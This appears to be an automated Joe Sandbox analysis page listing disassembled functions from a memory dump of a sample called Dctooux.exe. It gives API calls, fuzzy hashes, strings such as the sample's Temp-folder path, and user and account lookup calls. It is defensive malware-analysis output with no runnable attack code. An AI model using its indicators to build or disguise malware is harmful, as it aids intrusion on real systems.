Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: c9f0a74c74701ee5a8b3bdd37384d0b4857ce40c232e2a233a3bd3f6820cc836
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: F1118171641B04AED920B7B0CD4BFCB7BDC5F40791F404D15BBAA6A053DA38B5049F50

Uniqueness

Uniqueness Score: -1.00%

Function 00A68090 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 00A6DAFC: mtx_do_lock.LIBCPMT ref: 00A6DB04

__Mtx_unlock.LIBCPMT ref: 00A68161
std::_Rethrow_future_exception.LIBCPMT ref: 00A681B2
std::_Rethrow_future_exception.LIBCPMT ref: 00A681C2
__Mtx_unlock.LIBCPMT ref: 00A68265
__Mtx_unlock.LIBCPMT ref: 00A6836B
__Mtx_unlock.LIBCPMT ref: 00A683A6

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
String ID:
API String ID: 95294986-0
Opcode ID: 5c9dbce3ea9cc5f4c5ac707be39dbd6e907daf065f7e85ae3ec8d041ca61b7fb
Instruction ID: 7e9e7d98ef2d5aa9cdfddb99d59d22389169143fe71df2a564cfd749bdef7f58
Opcode Fuzzy Hash: 5c9dbce3ea9cc5f4c5ac707be39dbd6e907daf065f7e85ae3ec8d041ca61b7fb
Instruction Fuzzy Hash: FBC1E271E047049FDF20DFB4C945BAEBBF8AF05700F04466DE81697691EB79A908CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A9109F Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00A58B40,00000000), ref: 00A910E7
__fassign.LIBCMT ref: 00A912C6
__fassign.LIBCMT ref: 00A912E3
WriteFile.KERNEL32(?,00A58B40,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A9132B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A9136B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A91417

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 40d8d9bf66cf48de35c5deea5f27854b173b598139b2a7d9daee06b69f3cef88
Instruction ID: 4eb5f39cd7d77a8990b1c9bda1e337074cf85b135ecefc7871862225eecff4db
Opcode Fuzzy Hash: 40d8d9bf66cf48de35c5deea5f27854b173b598139b2a7d9daee06b69f3cef88
Instruction Fuzzy Hash: 6AD18B75E002599FCF15CFE8C9809EDBBF5AF49314F28016AE855FB252D630AD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A702AF Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 00A7030C
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00A70318
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00A70331
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00A7035F
Concurrency::Context::Block.LIBCONCRT ref: 00A70381

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: 5558be2b3b9b21dd5a1c162ea7b26ca9931942cd3e728c93c432101347bb5e0f
Instruction ID: 8a1b634c2e76443b62c8f95914fc873a292c1ffa5d6bc7322f7ddce559d17004
Opcode Fuzzy Hash: 5558be2b3b9b21dd5a1c162ea7b26ca9931942cd3e728c93c432101347bb5e0f
Instruction Fuzzy Hash: 25216B75900209CFDF24DFA4CD45AEEB7F0AF15310F20C66AE159AA1D1EBB18A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B476 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00A7B4B9

Part of subcall function 00A7C9B0: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00A7C9FF

GetCurrentThread.KERNEL32 ref: 00A7B4C3
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00A7B4CF

Part of subcall function 00A717D8: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00A717EA

Part of subcall function 00A71C64: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00A71C6B

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 00A7B512

Part of subcall function 00A7C962: SetEvent.KERNEL32(?,?,00A7B517,00A7C2AB,00000000,?,00000000,00A7C2AB,00000004,00A7C957,?,00000000,?,?,00000000), ref: 00A7C9A6

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00A7B51B

Part of subcall function 00A7BF91: List.LIBCONCRT ref: 00A7BFC7

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00A7B52B

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 318399070-0
Opcode ID: 5489f3cf40f50b4ded76c5bcc46e864fdea0fef908b61f7f6862ef501ce6a105
Instruction ID: f12875735e99d4f881c6fc0ae1f74dab7ba9ce6f75f4a55bb127fba9da10ec26
Opcode Fuzzy Hash: 5489f3cf40f50b4ded76c5bcc46e864fdea0fef908b61f7f6862ef501ce6a105
Instruction Fuzzy Hash: 5021BD71510B109FCB24EF64CA909AAF3F4FF48700700C91EE54BA7651CB34E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A86387 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A8637E,00A84F3F,00A6C9A5,F037EC41,?,00000000,00A9D1C8,000000FF,?,00A5232A,?,?), ref: 00A86395
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A863A3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A863BC
SetLastError.KERNEL32(00000000,?,00A8637E,00A84F3F,00A6C9A5,F037EC41,?,00000000,00A9D1C8,000000FF,?,00A5232A,?,?), ref: 00A8640E

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b2b3d092f778f7737924a835d755ffb963784a26a5edbdc347cb61d7279d0a44
Instruction ID: 31e1b9a225840668c844fc2279bc3303cb50cd02ad30b8b70b8ea0967ceb45ce
Opcode Fuzzy Hash: b2b3d092f778f7737924a835d755ffb963784a26a5edbdc347cb61d7279d0a44
Instruction Fuzzy Hash: 0801D432A0D7226EF7697BB87D85B6A2654EB11375730033AF524850F5EF528C4367C1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7106B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A71079
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A7107F
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A710AC
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A710B6
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A710C8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A710DE

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: a1c04a1e90da250a03faaadb0f1b84d18d16f8ea06ccd160be0e443eefbf2e70
Instruction ID: e7517e80ab759cfe6e763fddf11d60eeff977936dae7daf0ef9ec6809265e408
Opcode Fuzzy Hash: a1c04a1e90da250a03faaadb0f1b84d18d16f8ea06ccd160be0e443eefbf2e70
Instruction Fuzzy Hash: 81018F32600156E7CB14FBAADD09BBB36FCAB41751B20C829F559D2191EB20DD528760

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A3FA Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, xrefs: 00A8A43D, 00A8A47A
}_, xrefs: 00A8A4CF, 00A8A512
p3_, xrefs: 00A8A44B

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe$p3_$}_
API String ID: 0-253787929
Opcode ID: 519b87b46f15a19f6448484218659014e4e2a04491c5286ad24a5bd1e4bc0caa
Instruction ID: 64fa50b57c39cb2d42aaeb5a88cb3525cc1facec9cd8bcf0b94328271c79f153
Opcode Fuzzy Hash: 519b87b46f15a19f6448484218659014e4e2a04491c5286ad24a5bd1e4bc0caa
Instruction Fuzzy Hash: A341C071A00214AFEB25FB99DC85DAEBBBCEFA5710F140067F405A7211DBB08E41DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A8626A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00A862BD
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00A862D6
PMDtoOffset.LIBCMT ref: 00A862FC

Strings

Bad dynamic_cast!, xrefs: 00A8633E

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: d977036f46904202157c69506a07858747b52aac07d046b227d9178f1c0d9d0f
Instruction ID: b45dd27b96e3845b63b9faccbac9e13d856826751d11b3808d35eeb953f094b5
Opcode Fuzzy Hash: d977036f46904202157c69506a07858747b52aac07d046b227d9178f1c0d9d0f
Instruction Fuzzy Hash: 9F210B72E04205AFEF14FF64DE46EEE77B8EB45720B104669F91497181EB31ED108790

Uniqueness

Uniqueness Score: -1.00%

Function 00A8F3C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, xrefs: 00A8F3C8

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
API String ID: 0-3759040850
Opcode ID: 1012e2a484d837dc4219146abe777c7ffece042b55e6a0ae8f3a4e7c0f697864
Instruction ID: d0d2f545fe6c5d84ad2efa323c598de190b3162a64ba37ae57c40d3788295f3d
Opcode Fuzzy Hash: 1012e2a484d837dc4219146abe777c7ffece042b55e6a0ae8f3a4e7c0f697864
Instruction Fuzzy Hash: BD21A1B160420BAFDB20BF658D80D2B77ADEF453647108636F938D7151EB30EC108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A762F2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00A76351
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A76374
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00A763B6

Strings

count, xrefs: 00A7630A
ppVirtualProcessorRoots, xrefs: 00A7636C

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: 61b706a90359e3c6da7eac6fb090ccf382b397c895ee1ce31be4f2bef4b21f27
Instruction ID: 3560cced72d32a4a0eb36d938ac13764cd28e9d2115e63cd43ba7d847170c1fe
Opcode Fuzzy Hash: 61b706a90359e3c6da7eac6fb090ccf382b397c895ee1ce31be4f2bef4b21f27
Instruction Fuzzy Hash: 8F217F35A00615EFCB08EFA9CA91EAD77B5FF49300F008069F51A9B692DB71AE01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A885E9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00A8862B

Strings

.cmd, xrefs: 00A88649
.bat, xrefs: 00A8865A
.com, xrefs: 00A8866B
.exe, xrefs: 00A88638

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 2e691fe00022746baa074691ca42b57b7819d5ce54894052a0596dea7f4f8d4c
Instruction ID: 86a78634b29e9a81570a2cb753a6d2480a9d695ee870547b8a49c0fde6dc1052
Opcode Fuzzy Hash: 2e691fe00022746baa074691ca42b57b7819d5ce54894052a0596dea7f4f8d4c
Instruction Fuzzy Hash: 4701F937A0871635661431289D02A7B1B9A9FD6FB072A013EF944F71C1FF98DC0243E8

Uniqueness

Uniqueness Score: -1.00%

Function 00A87407 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00A87457

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 0c1d0c2cfb2c91cf7cfa2bf2a453b2a828ecfac3a973842dbdef000b8d0bb11e
Instruction ID: af64f14fcebd53754a1edf7332915ffb5f543c1570e0bd9b7a363e2d5de8aa04
Opcode Fuzzy Hash: 0c1d0c2cfb2c91cf7cfa2bf2a453b2a828ecfac3a973842dbdef000b8d0bb11e
Instruction Fuzzy Hash: 4A11AB31A09225ABDB32AB789C44B5E7F68AF467B0B314520ED16A72E1D730DD01D7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00A834E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 00A83504
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A83515
StructuredWorkStealingQueue.LIBCMT ref: 00A8354B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A8355C

Strings

e, xrefs: 00A83526

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 53c7626022cb4cf998fcc18bf218fc2336787f95bd66817ad3bd551a81bf82c6
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: F61173725001059FDF58FF6DC99166B77B5AF02754B14C169E8069F202DB71EF04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A879BD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00A879B2,?,?,00A8797A,?,?,?), ref: 00A879D2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A879E5
FreeLibrary.KERNEL32(00000000,?,?,00A879B2,?,?,00A8797A,?,?,?), ref: 00A87A08

Strings

CorExitProcess, xrefs: 00A879DD
mscoree.dll, xrefs: 00A879CB

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1cc229ee670f0ed864d788bb0ecf70c57fbdd3f47380c4e8337323dcc7295fa6
Instruction ID: dadf3f4a9efe31f6a0f7acd2657227dbf4782a63d0e5a9f4157e870072859bfb
Opcode Fuzzy Hash: 1cc229ee670f0ed864d788bb0ecf70c57fbdd3f47380c4e8337323dcc7295fa6
Instruction Fuzzy Hash: 14F0A73150411AFBDB12EB94DD09BDEBA75FB45755F200050F800A21E0CB70CE11DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A56A30 Relevance: 7.8, APIs: 5, Instructions: 253COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00A56A8A
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00A56AD0
